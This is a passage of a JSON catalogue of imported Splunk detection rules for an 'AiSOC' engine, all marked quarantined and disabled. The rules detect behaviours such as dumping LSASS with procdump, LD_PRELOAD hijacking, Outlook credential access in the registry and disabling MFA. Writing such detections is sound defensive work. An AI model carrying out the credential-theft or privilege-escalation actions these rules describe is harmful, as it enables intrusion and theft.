"mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-writing-a-dll-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "347fd388-da87-11eb-836d-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_writing_a_dll___sysmon.yml" } }, { "id": "splunk-security-content-350837b5-13d3-4c06-b688-db07afbe5050", "type": "detection", "name": "O365 Exfiltration via File Sync Download", "description": "The following analytic detects when an excessive number of files are sync from o365 by the same user over a short period of time. A malicious actor abuse the user-agent string through GUI or API access to evade triggering the FileDownloaded event. This behavior may indicate an attacker staging data for exfiltration or an insider threat removing organizational data. Additional attention should be taken with any Azure Guest (#EXT#) accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-exfiltration-via-file-sync-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "350837b5-13d3-4c06-b688-db07afbe5050", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_exfiltration_via_file_sync_download.yml" } }, { "id": "splunk-security-content-35159940-228f-11ec-8a49-acde48001122", "type": "detection", "name": "Vbscript Execution Using Wscript App", "description": "The following analytic detects the execution of VBScript using the wscript.exe application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because wscript.exe is typically not used to execute VBScript, which is usually associated with cscript.exe. This deviation can indicate an attempt to evade traditional process monitoring and antivirus defenses. If confirmed malicious, this technique could allow attackers to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/vbscript-execution-using-wscript-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35159940-228f-11ec-8a49-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/vbscript_execution_using_wscript_app.yml" } }, { "id": "splunk-security-content-35307032-a12d-11eb-835f-acde48001122", "type": "detection", "name": "Rundll32 with no Command Line Arguments with Network", "description": "The following analytic detects the execution of rundll32.exe without command line arguments, followed by a network connection. This behavior is identified using Endpoint Detection and Response (EDR) telemetry and network traffic data. It is significant because rundll32.exe typically requires arguments to function, and its absence is often associated with malicious activity, such as Cobalt Strike. If confirmed malicious, this activity could indicate an attempt to establish unauthorized network connections, potentially leading to data exfiltration or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-with-no-command-line-arguments-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35307032-a12d-11eb-835f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_with_no_command_line_arguments_with_network.yml" } }, { "id": "splunk-security-content-355ba810-0a20-4215-8485-9ce3f87f2e38", "type": "detection", "name": "Windows Excessive Usage Of Net App", "description": "The following analytic detects excessive usage of `net.exe` within a one-minute interval. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This behavior is significant as it may indicate an adversary attempting to create, delete, or disable multiple user accounts rapidly, a tactic observed in Monero mining incidents. If confirmed malicious, this activity could lead to unauthorized user account manipulation, potentially compromising system integrity and enabling further malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excessive-usage-of-net-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "355ba810-0a20-4215-8485-9ce3f87f2e38", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excessive_usage_of_net_app.yml" } }, { "id": "splunk-security-content-3596a799-6320-4a2f-8772-a9e98ddb2960", "type": "detection", "name": "Windows Data Destruction Recursive Exec Files Deletion", "description": "The following analytic identifies a suspicious process that is recursively deleting executable files on a compromised host. It leverages Sysmon Event Codes 23 and 26 to detect this activity by monitoring for a high volume of deletions or overwrites of files with extensions like .exe, .sys, and .dll. This behavior is significant as it is commonly associated with destructive malware such as CaddyWiper, DoubleZero, and SwiftSlicer, which aim to make file recovery impossible. If confirmed malicious, this activity could lead to significant data loss and system instability, severely impacting business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-data-destruction-recursive-exec-files-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3596a799-6320-4a2f-8772-a9e98ddb2960", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_data_destruction_recursive_exec_files_deletion.yml" } }, { "id": "splunk-security-content-35a61ed8-61c4-11ec-bc1e-acde48001122", "type": "detection", "name": "Suspicious Computer Account Name Change", "description": "The following analytic detects a suspicious computer account name change in Active Directory. It leverages Event ID 4781, which logs account name changes, to identify instances where a computer account name is changed to one that does not end with a `$`. This behavior is significant as it may indicate an attempt to exploit CVE-2021-42278 and CVE-2021-42287, which can lead to domain controller impersonation and privilege escalation. If confirmed malicious, this activity could allow an attacker to gain elevated privileges and potentially control the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-computer-account-name-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35a61ed8-61c4-11ec-bc1e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_computer_account_name_change.yml" } }, { "id": "splunk-security-content-35aeb0e7-7de5-444a-ac45-24d6788796ec", "type": "detection", "name": "Windows Spearphishing Attachment Onenote Spawn Mshta", "description": "The following analytic detects OneNote spawning `mshta.exe`, a behavior often associated with spearphishing attacks. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where OneNote is the parent process. This activity is significant as it is commonly used by malware families like TA551, AsyncRat, Redline, and DCRAT to execute malicious scripts. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to data exfiltration, system compromise, or further malware deployment. Immediate investigation and containment are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-spearphishing-attachment-onenote-spawn-mshta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35aeb0e7-7de5-444a-ac45-24d6788796ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_spearphishing_attachment_onenote_spawn_mshta.yml" } }, { "id": "splunk-security-content-35c50572-a70b-452f-afa9-bebdf3c3ce36", "type": "detection", "name": "Linux Auditd Preload Hijack Library Calls", "description": "The following analytic detects the use of the LD_PRELOAD environment variable to hijack or hook library functions on a Linux platform. It leverages data from Linux Auditd, focusing on process execution logs that include command-line details. This activity is significant because adversaries, malware authors, and red teamers commonly use this technique to gain elevated privileges and establish persistence on a compromised machine. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, and maintain long-term access to the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-preload-hijack-library-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35c50572-a70b-452f-afa9-bebdf3c3ce36", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_preload_hijack_library_calls.yml" } }, { "id": "splunk-security-content-35cd29ca-f08c-4489-8815-f715c45460d3", "type": "detection", "name": "Windows Ldifde Directory Object Behavior", "description": "The following analytic identifies the use of Ldifde.exe, a command-line utility for creating, modifying, or deleting LDAP directory objects. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution and command-line arguments. Monitoring Ldifde.exe is significant because it can be used by attackers to manipulate directory objects, potentially leading to unauthorized changes or data exfiltration. If confirmed malicious, this activity could allow an attacker to gain control over directory services, escalate privileges, or access sensitive information within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ldifde-directory-object-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35cd29ca-f08c-4489-8815-f715c45460d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ldifde_directory_object_behavior.yml" } }, { "id": "splunk-security-content-35eb6d19-a497-400c-93c5-645562804b11", "type": "detection", "name": "Windows Service Created with Suspicious Service Name", "description": "The following analytic detects the creation of a Windows Service with a known suspicious or malicious name using Windows Event ID 7045. It leverages logs from the `wineventlog_system` to identify these services installations. This activity is significant as adversaries, including those deploying Clop ransomware, often create malicious services for lateral movement, remote code execution, persistence, and execution. If confirmed malicious, this could allow attackers to maintain persistence, execute arbitrary code, and potentially escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-created-with-suspicious-service-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "35eb6d19-a497-400c-93c5-645562804b11", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_created_with_suspicious_service_name.yml" } }, { "id": "splunk-security-content-360ae6b0-38b5-4328-9e2b-bc9436cddb17", "type": "detection", "name": "Windows Process Injection Wermgr Child Process", "description": "The following analytic identifies a suspicious instance of wermgr.exe spawning a child process unrelated to error or fault handling. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process relationships and command-line executions. This activity is significant as it can indicate Qakbot malware, which injects malicious code into wermgr.exe to evade detection and execute malicious actions. If confirmed malicious, this behavior could allow an attacker to conduct reconnaissance, execute arbitrary code, and persist within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-wermgr-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "360ae6b0-38b5-4328-9e2b-bc9436cddb17", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_wermgr_child_process.yml" } }, { "id": "splunk-security-content-36334123-077d-47a2-b70c-6c7b3cc85049", "type": "detection", "name": "Windows Unsecured Outlook Credentials Access In Registry", "description": "The following analytic detects unauthorized access to Outlook credentials stored in the Windows registry. It leverages Windows Security Event logs, specifically EventCode 4663, to identify access attempts to registry paths associated with Outlook profiles. This activity is significant as it may indicate attempts to steal sensitive email credentials, which could lead to unauthorized access to email accounts. If confirmed malicious, this could allow attackers to exfiltrate sensitive information, impersonate users, or execute further unauthorized actions within Outlook, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsecured-outlook-credentials-access-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "36334123-077d-47a2-b70c-6c7b3cc85049", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsecured_outlook_credentials_access_in_registry.yml" } }, { "id": "splunk-security-content-36e46ebe-065a-11ec-b4c7-acde48001122", "type": "detection", "name": "Get ADDefaultDomainPasswordPolicy with Powershell", "description": "The following analytic detects the execution of `powershell.exe` running the `Get-ADDefaultDomainPasswordPolicy` cmdlet, which is used to retrieve the password policy in a Windows domain.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nMonitoring this activity is crucial as it can indicate attempts by adversaries to gather information about domain policies for situational awareness and Active Directory discovery.\nIf confirmed malicious, this activity could lead to further reconnaissance and potential exploitation of domain security settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-addefaultdomainpasswordpolicy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "36e46ebe-065a-11ec-b4c7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell.yml" } }, { "id": "splunk-security-content-36f9626c-4272-4808-aadd-267acce681c0", "type": "detection", "name": "Windows Modify Registry LongPathsEnabled", "description": "The following analytic detects a modification to the Windows registry setting \"LongPathsEnabled,\" which allows file paths longer than 260 characters. This detection leverages data from the Endpoint.Registry datamodel, focusing on changes to the specific registry path and value. This activity is significant because adversaries, including malware like BlackByte, exploit this setting to bypass file path limitations, potentially aiding in evasion techniques. If confirmed malicious, this modification could facilitate the execution of long-path payloads, aiding in persistence and further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-longpathsenabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "36f9626c-4272-4808-aadd-267acce681c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_longpathsenabled.yml" } }, { "id": "splunk-security-content-3718549b-867e-4084-b770-790e8dab6ab8", "type": "detection", "name": "Windows MSTSC RDP Commandline", "description": "The following analytic detects the use of the mstsc.exe command-line, which is commonly used to initiate Remote Desktop Protocol (RDP) connections. This detection focuses on instances where mstsc.exe is executed with specific parameters that may indicate suspicious or unauthorized remote access attempts. Monitoring command-line arguments such as /v: for direct connections or /admin for administrative sessions can help identify potential misuse or lateral movement within a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mstsc-rdp-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3718549b-867e-4084-b770-790e8dab6ab8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mstsc_rdp_commandline.yml" } }, { "id": "splunk-security-content-372176ba-450c-4abd-9b86-419bb44c1b76", "type": "detection", "name": "GitHub Enterprise Disable Classic Branch Protection Rule", "description": "The following analytic detects when classic branch protection rules are disabled in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for branch protection removal events by tracking actor details, repository information, and associated metadata. For a SOC, identifying disabled branch protection is critical as it could indicate attempts to bypass code review requirements and security controls. Branch protection rules are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-classic-branch-protection-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "372176ba-450c-4abd-9b86-419bb44c1b76", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_classic_branch_protection_rule.yml" } }, { "id": "splunk-security-content-3742ebfe-64c2-11eb-ae93-0242ac130002", "type": "detection", "name": "Dump LSASS via procdump", "description": "The following analytic detects the use of procdump.exe to dump the LSASS\nprocess, specifically looking for the -mm and -ma command-line arguments. It leverages\ndata from Endpoint Detection and Response (EDR) agents, focusing on process names,\ncommand-line executions, and parent processes. This activity is significant because\ndumping LSASS can expose sensitive credentials, posing a severe security risk. If\nconfirmed malicious, an attacker could obtain credentials, escalate privileges,\nand move laterally within the network, leading to potential data breaches and further\ncompromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dump-lsass-via-procdump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3742ebfe-64c2-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dump_lsass_via_procdump.yml" } }, { "id": "splunk-security-content-374832b1-3603-420c-b456-b373e24d34c0", "type": "detection", "name": "AWS Multi-Factor Authentication Disabled", "description": "The following analytic detects attempts to disable multi-factor authentication (MFA) for an AWS IAM user. It leverages AWS CloudTrail logs to identify events where MFA devices are deleted or deactivated. This activity is significant because disabling MFA can indicate an adversary attempting to weaken account security, potentially to maintain persistence using a compromised account. If confirmed malicious, this action could allow attackers to retain access to the AWS environment without detection, posing a significant risk to the security and integrity of the cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "374832b1-3603-420c-b456-b373e24d34c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-37a0ec8d-827e-4d6d-8025-cedf31f3a149", "type": "detection", "name": "Cloud Compute Instance Created By Previously Unseen User", "description": "The following analytic identifies the creation of cloud compute instances by users who have not previously created them. It leverages data from the Change data model, focusing on 'create' actions by users, and cross-references with a baseline of known user activities. This activity is significant as it may indicate unauthorized access or misuse of cloud resources by new or compromised accounts. If confirmed malicious, attackers could deploy unauthorized compute instances, leading to potential data exfiltration, increased costs, or further exploitation within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-by-previously-unseen-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "37a0ec8d-827e-4d6d-8025-cedf31f3a149", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml" } }, { "id": "splunk-security-content-383572e0-04c5-11ec-bdcc-acde48001122", "type": "detection", "name": "Domain Account Discovery with Wmic", "description": "The following analytic detects the execution of `wmic.exe` with command-line arguments used to query for domain users. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns indicative of domain account discovery. This activity is significant as it often precedes lateral movement or privilege escalation attempts by adversaries. If confirmed malicious, this behavior could allow attackers to map out user accounts within the domain, facilitating further attacks and potentially compromising sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/domain-account-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "383572e0-04c5-11ec-bdcc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/domain_account_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-386ad394-c9a7-4b4f-b66f-586252de20f0", "type": "detection", "name": "Windows Large Number of Computer Service Tickets Requested", "description": "The following analytic detects a high volume of Kerberos service ticket requests, specifically more than 30, from a single source within a 5-minute window. It leverages Event ID 4769, which logs when a Kerberos service ticket is requested, focusing on requests with computer names as the Service Name. This behavior is significant as it may indicate malicious activities such as lateral movement, malware staging, or reconnaissance. If confirmed malicious, an attacker could gain unauthorized access to multiple endpoints, potentially compromising the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-large-number-of-computer-service-tickets-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "386ad394-c9a7-4b4f-b66f-586252de20f0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_large_number_of_computer_service_tickets_requested.yml" } }, { "id": "splunk-security-content-386dd914-16e5-400b-9bf6-25572cc4415a", "type": "detection", "name": "Crowdstrike User with Duplicate Password", "description": "The following analytic detects CrowdStrike alerts for non-admin accounts with duplicate password risk, identifying instances where multiple non-admin users share the same password. This practice weakens security and increases the potential for unauthorized access. Addressing these alerts is essential to ensure each user account has a unique, strong password, thereby enhancing overall security and protecting sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-user-with-duplicate-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "386dd914-16e5-400b-9bf6-25572cc4415a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_user_with_duplicate_password.yml" } }, { "id": "splunk-security-content-387b278a-6326-11ec-aa2c-acde48001122", "type": "detection", "name": "Linux Install Kernel Module Using Modprobe Utility", "description": "The following analytic detects the installation of a Linux kernel module using the modprobe utility. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because installing a kernel module can indicate an attempt to deploy a rootkit or other malicious kernel-level code, potentially leading to elevated privileges and bypassing security detections. If confirmed malicious, this could allow an attacker to gain persistent, high-level access to the system, compromising its integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-install-kernel-module-using-modprobe-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "387b278a-6326-11ec-aa2c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_install_kernel_module_using_modprobe_utility.yml" } }, { "id": "splunk-security-content-387c4e78-f4a4-413d-ad44-e9f7bc4642c9", "type": "detection", "name": "Linux Busybox Privilege Escalation", "description": "The following analytic detects the execution of BusyBox with sudo privileges, which can lead to privilege escalation on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where BusyBox is executed with both 'sh' and 'sudo' commands. This activity is significant because it indicates a user may be attempting to gain root access, bypassing standard security controls. If confirmed malicious, this could allow an attacker to execute arbitrary commands as root, leading to full system compromise and potential persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-busybox-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", 